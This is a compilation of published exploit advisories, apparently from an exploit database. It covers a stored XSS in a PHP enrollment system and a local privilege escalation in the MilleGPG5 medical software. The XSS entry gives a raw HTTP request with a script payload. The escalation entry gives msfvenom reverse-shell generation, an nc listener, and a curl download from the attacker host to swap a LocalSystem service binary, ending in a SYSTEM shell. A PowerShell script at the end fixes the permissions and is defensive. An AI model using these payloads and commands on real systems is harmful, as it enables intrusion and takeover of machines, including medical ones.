#Example, vulnerable software installed on linux:   python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux
  24. # Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting
# Date: 2021-08-31
# Exploit Author: Tushar Jadhav
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Version: 1.0
# Tested on: Windows 11
# Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/
# CVE: CVE-2021-40577

=============================================================================================================================
Stored Cross-site scripting (XSS):
Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS.
==============================================================================================================================
Attack vector:
This vulnerability allows the attacker to inject an XSS payload in the User Registration section. Each time the admin or a basic user logs in to the admin panel, the XSS triggers and the attacker is able to steal the cookie according to the crafted payload.
===============================================================================================================================
Vulnerable Parameters: Name
===============================================================================================================================
Steps for reproducing:
1. Go to the add users section.
2. Fill in the details and put the <script>alert(document.cookie)</script> payload in the Name parameter.
3. Once we click on save, we can see the XSS has been triggered.
================================================================================================================================
Request:

POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1
Host: 192.168.1.205:81
Content-Length: 133
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.205:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3
Connection: close

deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=
===================================================================================================================================
  25. # Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.7.2
# Tested on: Microsoft Windows 10 Enterprise x64

MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".
Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.
Affected version: MilleGPG5 5.7.2

# Details
# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in the bin folder and replace it
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

(1) Impacted services.

Any low privileged user can elevate their privileges abusing these services:
C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe
C:\Program Files\MilleGPG5\GPGService.exe

Details:

SERVICE_NAME: MariaDB-GPG
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MariaDB-GPG
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
------
SERVICE_NAME: GPGOrchestrator
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\MilleGPG5\GPGService.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : GPG Orchestrator
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

(2) Folder permissions.

Insecure folder permissions issue:

C:\Program Files\MilleGPG5\MariaDB\bin
    BUILTIN\Users:(I)(OI)(CI)(F)
    NT SERVICE\TrustedInstaller:(I)(F)
    NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
    CREATOR OWNER:(I)(OI)(CI)(IO)(F)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
...[SNIP]...
---------------
C:\Program Files\MilleGPG5
    BUILTIN\Users:(OI)(CI)(F)
    NT SERVICE\TrustedInstaller:(I)(F)
    NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    BUILTIN\Users:(I)(RX)
    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
    CREATOR OWNER:(I)(OI)(CI)(IO)(F)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

# Proof of Concept

1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start

3. Download malicious .exe on victim machine, type on cmd:
curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
Rename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file to mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system
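A remediation and re-check for the folder permission issue reported above, as an added example that is not part of the advisory or the vendor's own tooling. It assumes the paths and service binaries listed in the advisory and is run from an elevated PowerShell on the affected host.

```powershell
# Added remediation example (not from the advisory). Run as Administrator.
# Goal: no non-admin principal may write into the folders that hold the two
# LocalSystem service binaries, so mysqld.exe / GPGService.exe cannot be swapped.
$paths = @(
    'C:\Program Files\MilleGPG5',
    'C:\Program Files\MilleGPG5\MariaDB\bin'
)

foreach ($p in $paths) {
    # Turn inherited ACEs into explicit ones, drop every grant for BUILTIN\Users,
    # then re-add Read & Execute only, inherited by subfolders (CI) and files (OI).
    icacls $p /inheritance:d | Out-Null
    icacls $p /remove:g 'BUILTIN\Users' | Out-Null
    icacls $p /grant:r 'BUILTIN\Users:(OI)(CI)RX' | Out-Null
}

# Re-check: warn about any remaining Allow ACE that gives Users or
# Authenticated Users write/modify/delete rights on the service binaries.
$binaries = @(
    'C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe',
    'C:\Program Files\MilleGPG5\GPGService.exe'
)
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::Delete

foreach ($b in $binaries) {
    (Get-Acl -Path $b).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference -match 'Users$' -and
            ($_.FileSystemRights -band $writeMask) -ne 0
        } |
        ForEach-Object {
            Write-Warning "$b is still writable by $($_.IdentityReference): $($_.FileSystemRights)"
        }
}
```

The same re-check is worth repeating after every vendor update, since an installer may restore the permissive ACL.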